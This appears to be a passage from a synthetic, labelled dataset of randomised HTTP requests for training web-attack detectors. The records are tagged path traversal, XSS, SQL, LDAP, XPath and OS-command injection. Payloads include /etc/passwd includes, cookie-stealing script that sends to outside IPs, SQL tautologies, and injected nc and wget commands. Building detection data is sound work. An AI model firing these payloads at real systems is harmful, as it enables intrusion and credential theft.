~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9eeswwcieesu=<!--    #include     virtual="/etc/passwd"     -->&fledcaoedi=metan8eO&ahria8Enatbj=teasdiu9ria0s9&kor=mm e&2ThorQ6Yqx7zC=5208960&7itreonu=(/eSshutdownrs7O&hdHl=aoinatrzs|2Gxp_U&5-clY=236874&yrtA0enke=object&iafaNem=talb

End - Id: 39548
Start - Id: 36008
class: PathTransversal
POST /sa/ohaw/AEchildXVJpasswdYt.e/inUIKbS/cuAtorDs6rp/wd3toXDZ--Ne/U1giframe8IwgetFvyBVGL/2teOkw7doeNTntstm/yoJW/1ltAfeitgiucsd/wo/uAn.dll? HTTP/1.1
Content-Length: 325
Content-Language: tiieot,ihlxe
Content-Encoding: deflate
Content-Location: /dgnc8ni/CeeQeEr.wmn
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 03 May 05 04:58:43 GMT
Host: www.tUju.net
Connection: keep-alive
Accept-Charset: windows-874, koi8-r, gb2312, euc-tw
Accept-Language: toaxjmu-LsL
Cache-Control: min-fresh=2
Date: Thu, 31 May 07 12:36:03 CET
From: snploe@2Ooln.biz
If-Unmodified-Since: Fri, 23 Jan 09 23:07:04 CET
If-None-Match: *
If-Range: *
Max-Forwards: 93
Pragma: no-cache
Referer: /s3pxhlnn/i5b1jtnv.cgi
User-Agent: ns72m9jk http://www.fuwrc.be
Via: 9.1 www.jcnsru9.png:3250, 6.7 121.9.5.186
Transfer-Encoding: compress
Warning: 658 108.103.139.154 "Iuht" 

eeokoec8=36365564&T2ettmpresoeuoh=akfn3.G&ufbctt5o=execa67ilhizss&kptaefrrsmlhlb=..\..\..\..\WINNT\system.ini&ew=5c)doeeizYscaa&tramererlzlrb=78620046&tqrgidacTe=6447878&syier=pzobLnadtRgw&unbpt5=12&UeeAvionkjmaTl=4&GR.ehttpsh=024&49Xftaa1ha=5r&roihohliyAe=E&Zgvcq9a5drssA4=hidropc :awh q()oh&ieSOstug=rnjen

End - Id: 36008
Start - Id: 47339
class: XSS
GET /xai2uOnoltnora5tnu/zsotabidse4dhMav9sng/nUWzkA1r/S34/cHuz2EkUtddu-mCiQv/udn/WpassthruynWq/80ZR4eFtRXSjvMhe/ny/sl/xoeyNldnneoseoeg.jsp?gicEu8tthmiW=73021895&oCePOem=%3Ca+++++href+%3D+++%22about%3A%3Cs%26%2399%3Bript++++%3E%5Bwindow.open%28%27http%3A%2F%2F232.77.49.187%2Fanol.nsf%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++++%3E+++%22+%3E&RotabIj=e2wsysteme%29zlink2%3C6 HTTP/1.1
Host: 127.72.243.201
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-8859-3, x-mac-japanese;q=0.8
Accept-Encoding: compress;q=0.6, deflate, gzip;q=0.6
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 88.199.53.236
Cookie: tii=924405
Cookie2: $Version="38"
Date: Thu, 10 Feb 05 08:06:13 UTC
ETag: W/"@ohBoT1s.JGyaGLB2"
Expect: 100-continue
From: iipt@ooal.biz
If-Modified-Since: Tue, 26 Feb 08 16:15:32 GMT
If-Unmodified-Since: Sun, 22 Oct 06 10:22:05 CET
If-Match: "4c6X8r8JEc1fGy.N935"
If-None-Match: "w7A9T6gUm2Ety7U0vHla"
If-Range: "egfgo4bKzrZfUZq"
Max-Forwards: 3149
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Digest algorithm=MD5
Range: -066761,152-
Referer: http://www.uatlpem.org/keio/O1at.bin
TE: trailers,trailers,deflate
Trailer: If-Match
User-Agent: ihbawzetat/2.3.9
UA-CPU: MIPS
UA-Disp: 699,6656,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 575x5791
Via: FTP/5.9 176.31.159.123:6
Transfer-Encoding: identity
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 030 32.43.121.212 "zsmp" 
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 31371
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47339
Start - Id: 35937
class: PathTransversal
GET /thWudJshutdownoy3UWNt/tvz@TPtwxaw-Qd0DYtsr/uhia/paoiig5/nh/ts0R/tz5QHxK_i.MCNlZkfS7h/y9Crluxk_Mji3zmocha.bin?bhmw=sutlmailetr&eiiyhttciw19xi=%3C%21--%23include++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+--%3E&h7w3yrH9=0kfeti&Slceii9exnncrf=ld%2F&bfjxpG4e=1447&rtflprt5iE4=alhesaSmseilaldez HTTP/1.0
Host: www.tzudbvra.be
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: t-nnel6, etT-8odoelW;q=0.3
Cache-Control: no-store
Client-ip: 111.208.189.237
Cookie: tyrtZ65s=7;CRJJV42ig=ehem8sinsertxselect$h;sesu=19492;wa=Inhy  fu
Cookie2: $Version="5"
Date: Fri, 01 May 09 12:34:01 CET
ETag: W/"KVz0darYpD@iPYSQ"
From: be1oUn2@8heteu9.de
If-Modified-Since: Mon, 07 Aug 06 03:03:17 UTC
If-Unmodified-Since: Wed, 10 May 06 21:02:53 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 12 Feb 09 24:36:05 GMT
Max-Forwards: 4
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ei6idr"
Authorization: NTLM RW9zaG1yZjIzOWFuYXR0dHJjYW1ybjM3aUVzb2kweW8xaGxuYmZzd2to
Range: -7654,73-181
Referer: http://ettnhe.com/lsaied/hsa68m/rctss1zu/ucyia2i.bin
TE: trailers
User-Agent: bmSxK_c http://www.saRmi.cz
UA-CPU: Sparc
UA-Disp: 684,759,32
UA-Color: color16
UA-Pixels: 279x705
Via: 2.5 83.23.86.116
Transfer-Encoding: compress
Warning: 334 www.lstanho.png "Hdnhe0hyyoGe34osiao" "Mon, 03 Nov 08 14:09:43 CET"
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35937
Start - Id: 42137
class: SqlInjection
GET /e-KEiOgmfmDe-JP3TdCH/xVdG_qejMDgJcMOMM0PE/ifEAy/anddTRwinntnz/eOfjT/ePN62q-kwazh6nhnW/o9Xnm2LWkZKHzIRRq/uO/lbAGlinsertZiframeh/cuYd-6qG1zB3_reLCsM_/Ae0a4tfvkic4gulll.asmx?cfWgJpyhomeX0=821465530&9j2RrlhscO=T9tnseA&feeSiOf=i1rewr&Ifhjt=063&edeapw3nLyn=u6PQnhh.&ca5teN=dunionduev+&dntg3nl2Tairs=OR+%27gpOieed%27++++%3D++++%27++++%27 HTTP/1.0
Host: 18.209.29.192
Connection: close
Accept: */*;q=0.7
Accept-Charset: isiri-3342;q=0.1, iso-2022-kr
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 157.188.148.246
Cookie: G8.cSn=50;KTWJU0=m
Cookie2: $Version="5"
Date: Wed, 20 Jan 10 23:46:53 CET
ETag: W/"Ylv1pWoSN89i715H"
Expect: 100-continue
From: yaieolw@dAieet.st
If-Modified-Since: Wed, 19 Oct 05 09:49:50 GMT
If-Unmodified-Since: Sat, 14 Jun 08 19:57:10 CET
If-Match: "uMVGvqYIw@j28IV1"
If-None-Match: "vjTHeazNFoKFOo3W4"
If-Range: Thu, 18 Aug 05 04:25:51 CET
Max-Forwards: 84
MIME-Version: 0.7
Pragma: 2ac='PNt'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: NTLM b280YmFob2RyZmRyb2FlZG1jdGRhc2g4c3N0c2Uyek5kZG53c2VidWRz
Range: 80-3804,023297-91,09-
Referer: /a4okEoea/f6rme/bOfnzrer/siah5/i3e5i.aspx
TE: trailers
Trailer: From
User-Agent: hjtirNtUl3/3.9.4.3.4
UA-CPU: StrongARM
UA-Disp: 988,870,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 929x052
Via: HTTP/1.9 84.120.40.149, enT8/2.0 www.es3cro.gif
Transfer-Encoding: compress
Upgrade: dct/0.8, isti/6.6, rDb4l/1.0
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 45705
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42137
Start - Id: 41409
class: SqlInjection
POST /itnr7hpf/hn4nUleZtm/nqna3/eOL9_rKwMPGtpr/sa/e1gwlWtKs.MDSz12K/ulsrdoEnht9Ysr1.js? HTTP/1.1
Content-Length: 312
Content-Language: e,E,sSe9
Content-Encoding: compress
Content-Location: http://gaeg.fr/brqwhA/arrORnec/nhrnm.png
Content-MD5: c3RuZXl6dGVmZWxzMzVhcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Apr 07 15:20:43 UTC
Last-Modified: Sat, 15 May 04 01:43:26 UTC
Host: www.i1sdnet.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 199.178.94.59
Cookie: J3processing-instructionS=c=rtt;meiaeond17zstg= b;d1efOhtooe=%itr3Mv2tstdindbvhi4;inz0Oet3Rmanar=r?dmed&eno;BWsDshutdownYROW4Nt=1hmhttpsNeb4a
Cookie2: $Version="59"
Date: Tue, 17 Oct 06 22:41:14 GMT
ETag: W/"RXW5dU6ImVA12N4s"
Expect: 2ecTeaoj=nIjI3BR
From: xttrniQd@tSeAtnO.net
If-Modified-Since: Tue, 02 Sep 08 22:06:57 GMT
If-Unmodified-Since: Wed, 26 Apr 06 12:17:41 CET
If-Match: *
If-None-Match: "MceWUSOt7uE07y1"
If-Range: Sun, 16 Jan 05 06:26:13 CET
Max-Forwards: 1266
MIME-Version: 2.2
Pragma: la=nkeDl
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: NTLM YWllaGhlbmR0aHM0dDRlNHRhNkVhZG94aWlmY3VLYXJjbmEzZGFyZTJ0cw==
Range: 24-
Referer: http://www.lplerECi.net/ciahilpl/r0aasspe.cgi
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: erku (h@prfpRs; iyXU08viX; n6feW1; 4trVRlOo)
UA-CPU: StrongARM
UA-Disp: 0223,7526,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1178x5140
Via: slrjs/2.3 www.t9enlmoP.tiff, 2.4 www.dtoot9.html
Transfer-Encoding: identity
Upgrade: etntne/4.1, Iossd/8.2
Warning: 883 164.170.254.130 "nAGe9a" 
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 15055892627895380
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tT6ltsabEshb=bgsound8sT&hc=' AND     USER_NAME()='cteJ&igiweifh65bagy=0damnc&aftoemdgeetniep=90&mn=\27ye2% areievaliptot&rhOkoeei=t0M?:=lib&urenita=87&L9ue03a2aig0er=d9Ue9RoKd&fs4I=o2dN&ssZnsahgbbn=a nt(guh&rs7ls0a=a6&gpsgpe=]3Mwnvar3asvbscript&7.EKN=nthnetcat$i oupdatenicopyNunion[t

End - Id: 41409
Start - Id: 37269
class: LdapInjection
GET /Ixn0xXU/abandDlbcO/seitaMug.tiff?5atieaedsO=48554024&scriptllikeZrbetweencopy=r4DNkxTZzPs6&jmhl7nsige=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&iE3wget9KZaccess_logRwx=igreeedolaS&wgetMboot.iniL1=rl5&auhhlsItsmnrueb=shutdownl3%3Dth%40form&smdarp0Bdesw=8596862&tfeN=s&gr9X9r=43183 HTTP/1.1
Host: 182.190.87.238
Connection: keep-alive
Accept: audio/*, video/quicktime;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-stale=94958
Client-ip: 99.144.142.168
Cookie: ia2ri=ce;losR1=iadt;selectPiz2nullpFK=  ;OQJQ9yo=hhtc:renaoni9uht
Cookie2: $Version="568"
Date: Thu, 07 Jan 10 16:21:23 GMT
ETag: "c2q1F40XlNMIvjqJysAm"
Expect: p8iat=rbdrs
If-Modified-Since: Wed, 15 Apr 09 15:56:00 CET
If-Unmodified-Since: Thu, 16 Jul 09 09:19:21 GMT
If-Match: "fkONyWDaa6Oi4ebj"
If-None-Match: "ql@g@B.bJlphz.ZfBURO"
If-Range: *
Max-Forwards: 3163
MIME-Version: 9.8
Pragma: 2w=eeus
Proxy-Authorization: Basic dG9hc3RuOnNodnNocg==
Authorization: mjtl94 7nwt=suovn
Referer: /a3uoadku/upop/aa0axwta/nKrk1htm/egk3re.ace
User-Agent: eannrwnsub
UA-Disp: 1312,6035,32
Via: 8.5 www.thehosc.tiff
Upgrade: ftit/3.2, noyen/9.2, iynm/4.4, eps/3.2, rilhn/0.5
X-Forwarded-For: 91.87.25.249
----: -------------

null

End - Id: 37269
Start - Id: 44919
class: PathTransversal
GET /4n6p@wfromhbin/zey5NVDHUaPQEYdB/kmzuBFoc6Ix/T3AUzfgFSyJjQ/erivipb/diy/ah4or8rxedia5mi2/nfe/ezsna/vlA6teobaees.gif?_X0VMs=268098&MsabrteJai=collection%28file%3A%2F%2F%2Fc%3A%2Fav%2Fatm.xml+%29&o0eaaoynkbse8=3&rmmiPhrrahm=194853&hey1aer=2145&xIwMs6W3tw=etweaNn&IBgsbetweenfCu=ax.GsWOZ HTTP/1.0
Host: 194.241.54.40
Connection: exgeM
Accept: video/*, audio/basic
Accept-Charset: x-mac-arabic, iso-8859-6
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 117.77.195.37
Cookie: HkncoTaynpt=Dphps;y7X3RxtermBm7QZ=5;iaceerNasovac=nodpsfnooe
Cookie2: $Version="12"
Date: Wed, 23 Jun 04 09:58:14 UTC
ETag: W/"xgozFDJQuQqPl-86u-"
Expect: r1deaen
From: erlpd29@hbwsenumTc.de
If-Modified-Since: Fri, 15 May 09 17:54:38 UTC
If-Unmodified-Since: Fri, 23 Jan 04 06:34:24 UTC
If-Match: "bYmRxm3JoHIIpH8Cv3"
If-None-Match: *
If-Range: "2b967b0-Bkcc4co"
Max-Forwards: 1403
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Basic ZUVpejZkbm06ZlhjM2ht
Authorization: Digest response="A8cC9A11411f31BeFefff6b7b4cc88bc"
Range: 50635-77
Referer: /siCefmm/rarwmj/ocmcI.htm
TE: trailers,trailers,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/7.2 (Windows; U; Windows NT 0.4; te-kz; rv:3.4.5) Gecko/13113068
UA-CPU: StrongARM
UA-Disp: 714,744,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6797x3315
Via: 9.6 16.59.221.72, oes/1.7 www.rax0smc.css, HTTP/9.1 170.218.222.238
Transfer-Encoding: deflate
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 640 197.125.93.67 "pyiaiihnet7qbt" "Wed, 01 Apr 09 17:31:52 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44919
Start - Id: 43470
class: OsCommanding
GET /e84zsBae.z4hRfVju39/lse0am/2t5pedra2njd/i2D8p-1mmCnh5.s0u/oJqq/1x8wt9eyf9/Gvt3Tt_gY0/xvudoeriAarrm5Oerr8w/accnizcgt/e_DA5AyC/insertNUdxdocument5.swf?hxeixe4q=794&nuHeadatlao=e5Eh%5Dpoe8iframe%7E&0y2vx0V=990307&fqiusrJ_=68573&fei5e=886639&uaZymuhirao5gm=64755142&nmNpOnvGsr3o19=fenantere6e&tu=nAFW9siW&Nqi=%250a+++nc++www.elonasentero.com+++80+++++%3B&skbgskur2huE0sn=ateadx&Sbmx6deotixo=e5otNHdqnTPcany&rnnugif=Dd5tl HTTP/1.0
Host: 99.16.246.143:4
Connection: keep-alive
Accept: text/html, application/*
Accept-Charset: iso-8859-8
Accept-Encoding: deflate;q=0.6, identity, gzip
Accept-Language: s1N-I
Cache-Control: max-stale
Client-ip: 5.223.71.17
Cookie: 40objectwhereAUe3=445;oeta9ssb7gfl9=Tpgas
Cookie2: $Version="2"
Date: Mon, 09 Oct 06 03:57:34 GMT
ETag: "W_D-MMI1DqBWzuzV"
Expect: a0e4=fTceith;k6wd=ANnd
From: t3bs@fsiaebtorf.it
If-Modified-Since: Wed, 13 Jan 10 04:11:00 CET
If-Unmodified-Since: Tue, 20 Apr 04 03:39:54 GMT
If-Match: *
If-None-Match: "OmUZW4kPfDr9gUBg_"
If-Range: *
Max-Forwards: 1405
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest username="ncuenm"
Authorization: NTLM YTN1bmF0dUN0YWhyaWhyeWlzZ3VzMnJ0bmRydHRib3NvYWxTaGlvdG5ldHhlYmh5
Referer: http://iictcziv.it/sSnes2/uteshpe/iandtsmr/rc5ne/3ithofSn.tiff
TE: chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/0.1 (X11; U; Open BSD i386 2.2; r7-gr; rv:4.9.1) Gecko/68917273
UA-CPU: Sparc
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 828x8678
Via: FTP/8.3 www.sNniaeis.html, 7.0 95.104.213.87
Transfer-Encoding: hetle9; eruru5ea=vai5td
Upgrade: nsae/6.6
Warning: 666 166.163.91.248 "reqnetwydVCbEhnmif" "Thu, 16 Oct 08 05:40:51 UTC"
----: -----------------------------

null

End - Id: 43470
Start - Id: 41823
class: SqlInjection
GET /araapeul3g5tFI/FJVr/3StL6kH9z/oYinttmOechnn/jslyssNsbeaoE4rrm/er9e/r3tuicvtgmeo/m8B7CBtWww1gqu.swf?dmhdn=tQG&oDhdPaA=aEzrUPJ1&x28NNxp_Rm9=%27++group+++by++users.id++having+263%3D263 HTTP/1.1
Host: 44.37.16.183
Connection: keep-alive
Accept: */*
Accept-Charset: cp-950;q=0.8, x-mac-japanese, euc-cn;q=0.0, shift_jis, iso-2022-jp
Accept-Encoding: gzip;q=0.8
Accept-Language: ntoesVm-ptmbr;q=0.6
Cache-Control: only-if-cached
Client-ip: 200.70.15.74
Cookie: Edmmbm6xJp=a7;htmzrpHdsiht=2;abxr0e=laceA
Cookie2: $Version="571"
Date: Sun, 18 Mar 07 12:14:08 UTC
ETag: W/"Tc@F6JEKUDHdlFzOY"
Expect: jao4e=iser
From: n7s1Iyet@heedldG.st
If-Modified-Since: Sat, 04 Mar 06 05:39:39 UTC
If-Unmodified-Since: Thu, 31 Jul 08 21:44:13 GMT
If-Match: "Z950G3Wh9L7iZ-qA"
If-None-Match: "cCddMlT9Dyf7Y4L"
If-Range: "GbowhZ4Hwwm7mdr"
Max-Forwards: 6
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic aGUzczpsZXRh
Range: 1-,-175130,8812-321864
Referer: http://ivboips.it/e6aa6O/6ghrrdm2.msf
TE: gzip,deflate,trailers
Trailer: Max-Forwards
User-Agent: zteeufeerAoycf91Mfpc
UA-CPU: StrongARM
UA-Disp: 0572,127,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8410x009
Via: HTTP/1.6 www.o2o2rtes.gif, 0.4 61.159.11.145
Transfer-Encoding: identity
Upgrade: 9nonaK/4.3
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 206.140.252.134
X-Serial-Number: 431124702375
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41823
Start - Id: 43619
class: OsCommanding
PUT /akDZkhDsDV/n-K_3XIcfBV.BP@F/iMN4C6crbs3c4O.cfm? HTTP/1.1
Content-Length: 299
Content-Language: hneo8eel,8,n
Content-Encoding: gzip
Content-Location: /Elst/Hsgl/n0eni/jef4ti.swf
Content-MD5: bGcwc29yblVvZ3RpbzFyTg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 29 Nov 06 13:39:27 UTC
Last-Modified: Fri, 24 Sep 04 16:43:36 CET
Host: 181.182.9.58
Connection: nysss
Accept: */*;q=0.1
Accept-Charset: x-mac-japanese;q=0.8, windows-1254
Accept-Encoding: ";    /usr/bin/wget    www.nill.com/ictrllra    ;
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 242.4.203.84
Cookie: 9-L42OWUu-shutdown@=59589;0lrdTCr=535;sbC7o=staneaehhteO
Cookie2: $Version="35"
Date: Fri, 16 Dec 05 06:44:11 CET
ETag: W/"xa95_w0Wlj3Xi2ojD"
Expect: MTefsoo
From: ihse@2d96a.de
If-Modified-Since: Wed, 12 Jan 05 07:06:59 CET
If-Unmodified-Since: Mon, 22 Jun 09 20:30:05 GMT
If-Match: "gjLiL-CT6vlHHE@"
If-None-Match: "bS64XQ@FMM274TrH"
If-Range: Sat, 03 Apr 10 05:36:18 UTC
Max-Forwards: 100
MIME-Version: 3.1
Pragma: Goea='hl0u1y'
Proxy-Authorization: Basic Y2xzaWhoOnRlYXQ=
Authorization: NTLM YXZwbGhyZWUxOW9laWxvaW9tZjNuZWFwYW5yWXJpb3h3ZXJj
Range: 559-01519,-1,07-
Referer: /ogitr/eeaknhwh.jpeg
TE: deflate;q=0.5
User-Agent: seilA (iFnh0TS@MM)
UA-CPU: PowerPC
UA-Disp: 2173,331,32
UA-Pixels: 6552x5468
Via: FTP/2.6 www.baze.js, oEur/5.8 www.rzAn.html:04
Transfer-Encoding: compress
Upgrade: ztui/9.8, e5en/4.5, osoee/7.9, inhqa/2.0, 7Mlsb/6.6
Warning: 203 www.i7bgteAE.htm "IsqHs" 
X-Forwarded-For: 1.73.97.53
X-Serial-Number: 3989371
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9m5shSden4=42&Sebv4lad=bgsoundi)t-Ie&xur=i&rtl7obI9obsK=aU1REnchtwieet&thmeshroskARlat=hFa@aS&nuP6nmetsr8ipi=uddropeH>ni0&73jksr@libO=unn&ao09=i~t1d/If&Q8wfYdeletehT=eai'7&tcF5nbcevy2obhs=$ds~iaujd+gea erwu&rspidptoaMdgd=nHcbzctm9pmm7&gprt4u=sm5nTyl$n&6d3vH=hZ4Oo&irdr9=037305587

End - Id: 43619
Start - Id: 47282
class: XSS
GET /u1h4/aeesusgwqsehsnmihrt/n0p4eaey/sAm9eeedmehoborr.dll?QmVboJaG9YW=%3Cstyle+++type+++%3D%22+text%2Fjavascript+++++%22++++%3E%5Bwindow.open%28%27http%3A%2F%2F242.19.42.36%2Flatode.pl%27%2Bdocument.cookie%29%3B%5D%3C%2Fstyle+++%3E&6oont=hixeT&mvmessuoree2=56470 HTTP/1.1
Host: 13.255.65.207
Connection: close
Accept: */*
Accept-Charset: iso-8859-1;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: atc5n-neord;q=0.4, s70-b13m, rodlsoU-cr6s;q=0.9, 7r5eid-Tirie;q=0.5, rtaehtaz-iaeRw
Cache-Control: no-cache
Client-ip: 48.5.47.91
Cookie: z8eCTf4reolt=cymcspot;hI=7
Cookie2: $Version="73"
Date: Sun, 18 Mar 07 03:33:25 GMT
ETag: "czJyaTq7@vJjs.KcRANI"
Expect: eplnt
From: peTeu9@mayraae.fr
If-Modified-Since: Sat, 11 Oct 08 20:17:52 CET
If-Unmodified-Since: Thu, 26 Nov 09 01:38:15 UTC
If-Match: "WrKP27J.hjXxkUaeMc"
If-None-Match: "9PVXS6pC51Vzh4ZZ"
If-Range: "fdxgrRwlfyB.BziEyE-"
Max-Forwards: 1
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: elWea ara5=ThudDeet
Authorization: Digest nonce
Range: 3-25949,-0524
Referer: http://Ldeoojot.org/Yeecns/5htr/sq0rea/lnoyegeE/lllth.mp3
TE: deflate
Trailer: Upgrade
User-Agent: Mozilla/2.2 (compatible; Konqueror/0.3; Windows NT; nLhm)
UA-CPU: x86
UA-Disp: 3073,5344,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 581x8741
Via: HTTP/5.1 www.ltebddv.css, Tasc/4.6 246.234.226.165, FTP/7.0 88.33.70.47
Transfer-Encoding: cSeefi; s7oi=ahdwHao
Upgrade: mtnf/1.5
Warning: 047 125.243.221.59 "FolaPnotvWe1rchha" 
X-Forwarded-For: 135.30.4.5
X-Serial-Number: 730054725159445
----: ----------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 47282
Start - Id: 48672
class: XPathInjection
POST /pytxeaetcaazadhtI/rl5uebtihzOd/agrKJszbBDiWIt/dLophERAQ9VNfyXYn/execIrSCEH.php? HTTP/1.1
Content-Length: 412
Content-Language: pg
Content-Encoding: identity
Content-Location: http://www.l5atps.com/RvpuhE.htm
Content-MD5: bHQ1c3Nhb2VveGltaGdlbg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 29 Jul 09 17:53:57 GMT
Last-Modified: Thu, 15 Jun 06 23:18:11 UTC
Host: www.scssfft.be
Connection: plina
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 94.68.181.174
Cookie: iaino8De5S=4;bvHmhrin=n.oYSkgs.tO;neisentliot=oWCw8x0DP
Cookie2: $Version="97"
Date: Wed, 14 Feb 07 03:30:18 GMT
ETag: "3.OeJwn1snCY3-uU"
Expect: fdei
From: e32rlse@ib5bceaa.org
If-Modified-Since: Thu, 13 Oct 05 23:37:38 GMT
If-Unmodified-Since: Thu, 02 Oct 08 06:32:48 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 15 Jun 06 05:47:58 UTC
Max-Forwards: 2708
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic dHNlbTppbWhz
Authorization: 4snho cM2brwm1=rdelen
Range: 12-
Referer: http://www.stonhne.gov/ohko/ac1ysitl/i5ytnaea.mspx
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.3 (X11; U; Open BSD i386 4.6; ep-r7; rv:6.2.2) Gecko/15721412
UA-CPU: x86
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: 2.2 www.adAnfHn.png
Transfer-Encoding: deflate
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 456 136.21.126.138:79216 "9ErN6ntiDgwn" 
X-Forwarded-For: 32.231.214.148
X-Serial-Number: 9550547356245150782
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

npElt=9&E&eedtEae477n5o=tod@&heafta=inm&=/pxxtermR oiom7elr+&9ewulsu=hosjfttsGioebl&fhywms=4052&eeaj4orhzuciun=assepu/g/e/child::node()[ position()=692]     |    itc/qatdar/ab/child::text()[position()=4]  or  'TsinYi'   =    '&Asr=\zedivrd&ftmae5Se=u|ewtTnsob&nttdnanErts=l4rIi~v4Ti@ou n&rni=wawsbuWc&Ueatodiiud6iza=35342633&ZrUwia=07

End - Id: 48672
Start - Id: 46502
class: XSS
GET /<script>alert('Vulnerable')</script>.jsp? HTTP/1.0
Host: 70.6.55.86:5287
Connection: keep-alive
Accept: video/*, application/postscript;q=0.7
Accept-Charset: utf-7;q=0.8, big5, x-mac-greek, us-ascii
Accept-Encoding: compress, identity;q=0.4, compress
Accept-Language: ccean9-een;q=0.0, luakat6I-lwen25;q=0.0, o-toeiSi;q=0.3, q8ctvs-et, erjw-e;q=0.9
Cache-Control: eohn1=y
Client-ip: 219.134.80.54
Cookie: txse=mwisoeEasoets;ymcteevtn=rdit0)ajevaltteiRT8tio;uioeq9raRsieh=2162157
Cookie2: $Version="042"
Date: Sun, 13 Jul 08 04:54:35 UTC
ETag: W/"CdcL9D22QKTslk5h3r"
Expect: 100-continue
From: piteR@trksge.gov
If-Modified-Since: Thu, 26 Oct 06 04:35:25 GMT
If-Unmodified-Since: Mon, 12 May 08 13:07:37 CET
If-Match: *
If-None-Match: *
If-Range: "-j9OI@AIkxXhBo86PRq"
Max-Forwards: 2521
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic ZXNjdm5wOjZzUmlp
Range: 8-112855,2026-165541
Referer: /hvial/lamrpc/tvbr/eshbns/iheais.cfm
TE: trailers,trailers
Trailer: Date
User-Agent: Mozilla/3.3 (X11; U; Solaris 6.8; cH-Ai; rv:6.1.4) Gecko/92433023
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 139x000
Via: 7.7 100.228.143.166
Transfer-Encoding: identity
Upgrade: lNa/8.0, nnchdy/2.1, q9de/3.4, se9N7o/1.4
Warning: 834 www.Zmliw.gif "s7aFxS3" "Wed, 07 Dec 05 08:00:39 CET"
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46502
Start - Id: 44708
class: PathTransversal
PUT /bgsoundT63CM/o6obzs/wphiT.pl? HTTP/1.0
Content-Length: 336
Content-Language: 3Nree,T,rtjlit
Content-Encoding: gzip
Content-Location: http://www.trn3l.uk/hhekoaU/4e0s5a1o/Eeoes.mdb
Content-MD5: RWxudG81b3RzbXlubnN0RQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 30 Jun 08 14:44:43 CET
